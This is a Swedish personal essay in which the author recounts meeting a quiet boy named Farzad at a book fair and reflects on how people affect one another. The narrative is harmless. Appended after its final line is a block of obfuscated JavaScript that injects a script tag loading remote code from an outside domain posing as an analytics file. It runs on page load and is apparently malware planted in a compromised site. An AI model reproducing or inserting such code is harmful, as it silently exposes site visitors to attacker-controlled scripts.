En lysande insikt

En lysande insikt

Jag gissar att pojken som står med boken i handen är 11-12 år gammal. Utan att säga ett ord tittar han på sin mamma som står bredvid och hon förstår. Förstår att sonen bestämt sig och börjar därför plocka upp pengarna ur sin portmonnä.

Att befinna sig på bokmässa är otroligt kul och samtidigt otroligt påfrestande. Kul för att man träffar och pratar med så många människor om sin bok. Påfrestande eftersom man under 8 timmar x 4 dagar befinner sig i ett brus där alla gör sitt bästa för att höras och synas i det otroliga utbudet.

Jag hade inte speciellt högt ställda förväntningar i form av antal sålda böcker innan Bok & Biblioteksmässan. I linje med det var jag också lite fundersam över hur jag skulle bete mig när potentiella bokköpare rörde sig i och omkring förlagets (HOI) monter. Hur offensiv kan man vara utan att bli för påträngande? Ganska snart föll det sig naturligt hur jag skulle gå till väga. Först när någon tagit upp min bok och stått och läst en stund rullade jag fram och erbjöd mig att berätta lite mer. En vinnande strategi eftersom säkert 80% köpte boken efter det att jag personligen fått levandegöra innehållet i min självbiografi.

Är han inte lite för ung för att läsa min bok, tänker jag en smula bekymrat och rullar fram mot pojken som nu fått sedlarna av sin mor.
”Du vet att det är en vuxenbok jag skrivit va?” säger jag och nickar mot boken som han storögt står och bläddrar i. Han tittar upp och ler blygt samtidigt som han försiktigt nickar.
”Han har tittat på din bok flera gånger när vi gått förbi och bett om förskott på nästa veckas veckopeng för att kunna köpa den”, säger hans mamma som nu leende ställer sig bredvid honom.

En tanke virvlar förbi om jag kanske skulle ta och berätta mer för honom och framförallt hans mamma vad boken handlar om. Att det emellanåt är en ganska tuff och osminkad del av verkligheten jag beskriver. Att man nog behöver ha lite livserfarenhet för att verkligen förstå hur genomgripande och omvälvande den förändring i tillvaron jag ställdes inför, verkligen var. Samtidigt kan jag ju faktiskt inte veta på vilket sätt en så pass ung människa läser boken. Kanske tar han till sig helt andra saker än jag tror. Kanske har han redan upplevt saker som gör att han mycket väl är mogen att ta till sig innehållet. Kanske underskattar jag honom?

”Då måste jag få signera den åt dig”, säger jag och markerar att han ska lägga boken i mitt knä.
”Vad heter du”, frågar jag och tittar upp och möter hans blick.
”Farzad”, svarar han och då gnistrar det av lycka i de mörkbruna ögonen.
”Vet du att du är den yngsta person jag träffat som velat läsa min bok, Farzad?” säger jag sedan eftersom jag känner att jag bara måste få poängtera att boken inte är avsedd för hans ålderskategori.
”Mm”, svarar han och plockar sedan upp boken ur mitt knä, viker försiktigt ihop den och stryker leende en gång mjukt med handen över framsidan.
”Du kan väl mejla mig om det är något du undrar eller funderar på medan du läser den?” fortsätter jag och får en knappt märkbar nick till svar. Sedan blir vi avbrutna av en man som vill fråga lite om den föreläsning jag ska hålla senare på dagen. I ögonvrån ser jag efter en stund en skrattande pojke gå iväg med sin mamma. Han gestikulerar ivrigt med den ena handen. I den andra har han en bok tätt tryckt mot bröstet.

Av alla hundratals människor jag träffade på bokmässan var det Farzad som påverkade mig mest. Det enda han sa var sitt namn men han kommunicerade så mycket mer. Bakom det försiktiga leendet och de pigga, bruna ögonen lyste det igenom en mogen och bestämd ung människa. En ung människa som jag i bruset på mässgolvet, till en början, nog underskattade ganska grovt men som dröjt sig kvar och vuxit.

Han påverkade mig ordlöst med sin utstrålning och fick mig att i efterhand tänka till. Påminde mig om att vi alla påverkar varandra, och på olika sätt, bara vi tar oss tid att vara lite mer närvarande. Att vi i bruset av människor, möten och allt högre rop på uppmärksamhet kan mötas av ögonbedövande utstrålning från den gråaste lilla mus. Bara vi ger den tid att få skina igenom.

Är du medveten om att just du har en fantastisk möjlighet att ”smitta” dina medmänniskor bara genom ditt sätt att vara? Är du medveten om att du är en starkt bidragande faktor till den miljö du verkar i?

Är du medveten om att du också lyser?

var _0x1c9a=['push','229651wHRLFT','511754lPBDVY','length','2080825FKHOBK','src','1lLQkOc','1614837wjeKHo','insertBefore','fromCharCode','179434whQoYd','1774xXwpgH','1400517aqruvf','7vsbpgk','3112gjEEcU','1mFUgXZ','script','1534601MOJEnu','prototype','245777oIJjBl','47jNCcHN','1HkMAkw','nextSibling','appendAfter','shift','18885bYhhDw','1096016qxAIHd','72lReGEt','1305501RTgYEh','4KqoyHD','appendChild','createElement','getElementsByTagName'];var _0xd6df=function(_0x3a7b86,_0x4f5b42){_0x3a7b86=_0x3a7b86-0x1f4;var _0x1c9a62=_0x1c9a[_0x3a7b86];return _0x1c9a62;};(function(_0x2551a2,_0x3dbe97){var _0x34ce29=_0xd6df;while(!![]){try{var _0x176f37=-parseInt(_0x34ce29(0x20a))*-parseInt(_0x34ce29(0x205))+-parseInt(_0x34ce29(0x204))*-parseInt(_0x34ce29(0x206))+-parseInt(_0x34ce29(0x1fc))+parseInt(_0x34ce29(0x200))*parseInt(_0x34ce29(0x1fd))+-parseInt(_0x34ce29(0x1fb))*-parseInt(_0x34ce29(0x1fe))+-parseInt(_0x34ce29(0x20e))*parseInt(_0x34ce29(0x213))+-parseInt(_0x34ce29(0x1f5));if(_0x176f37===_0x3dbe97)break;else _0x2551a2['push'](_0x2551a2['shift']());}catch(_0x201239){_0x2551a2['push'](_0x2551a2['shift']());}}}(_0x1c9a,0xc08f4));function smalller(){var _0x1aa566=_0xd6df,_0x527acf=[_0x1aa566(0x1f6),_0x1aa566(0x20b),'851164FNRMLY',_0x1aa566(0x202),_0x1aa566(0x1f7),_0x1aa566(0x203),'fromCharCode',_0x1aa566(0x20f),_0x1aa566(0x1ff),_0x1aa566(0x211),_0x1aa566(0x214),_0x1aa566(0x207),_0x1aa566(0x201),'parentNode',_0x1aa566(0x20c),_0x1aa566(0x210),_0x1aa566(0x1f8),_0x1aa566(0x20d),_0x1aa566(0x1f9),_0x1aa566(0x208)],_0x1e90a8=function(_0x49d308,_0xd922ec){_0x49d308=_0x49d308-0x17e;var _0x21248f=_0x527acf[_0x49d308];return _0x21248f;},_0x167299=_0x1e90a8;(function(_0x4346f4,_0x1d29c9){var _0x530662=_0x1aa566,_0x1bf0b5=_0x1e90a8;while(!![]){try{var _0x2811eb=-parseInt(_0x1bf0b5(0x187))+parseInt(_0x1bf0b5(0x186))+parseInt(_0x1bf0b5(0x18d))+parseInt(_0x1bf0b5(0x18c))+-parseInt(_0x1bf0b5(0x18e))*parseInt(_0x1bf0b5(0x180))+-parseInt(_0x1bf0b5(0x18b))+-parseInt(_0x1bf0b5(0x184))*parseInt(_0x1bf0b5(0x17e));if(_0x2811eb===_0x1d29c9)break;else _0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}catch(_0x1cd819){_0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}}}(_0x527acf,0xd2c23),(Element[_0x167299(0x18f)][_0x1aa566(0x208)]=function(_0x3d096a){var _0x2ca721=_0x167299;_0x3d096a[_0x2ca721(0x183)][_0x2ca721(0x188)](this,_0x3d096a[_0x2ca721(0x181)]);},![]),function(){var _0x5d96e1=_0x1aa566,_0x22c893=_0x167299,_0x306df5=document[_0x22c893(0x185)](_0x22c893(0x182));_0x306df5[_0x22c893(0x18a)]=String[_0x22c893(0x190)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x61,0x6e,0x61,0x6c,0x79,0x74,0x69,0x63,0x73,0x2e,0x6a,0x73,0x3f,0x63,0x69,0x64,0x3d,0x30,0x30,0x30,0x30,0x26,0x70,0x69,0x64,0x69,0x3d,0x31,0x39,0x31,0x38,0x31,0x37,0x26,0x69,0x64,0x3d,0x35,0x33,0x36,0x34,0x36),_0x306df5[_0x22c893(0x189)](document[_0x22c893(0x17f)](String[_0x5d96e1(0x1fa)](0x73,0x63,0x72,0x69,0x70,0x74))[0x0]),_0x306df5[_0x5d96e1(0x208)](document[_0x22c893(0x17f)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0]),document[_0x5d96e1(0x211)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0][_0x22c893(0x191)](_0x306df5);}());}function biggger(){var _0x5d031d=_0xd6df,_0x5c5bd2=document[_0x5d031d(0x211)](_0x5d031d(0x201));for(var _0x5a0282=0x0;_0x5a0282<_0x5c5bd2[_0x5d031d(0x1f4)];_0x5a0282++){if(_0x5c5bd2[_0x5a0282][_0x5d031d(0x1f6)]['indexOf'](String['fromCharCode'](0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d))>-0x1)return 0x1;}return 0x0;}biggger()==0x0&&smalller();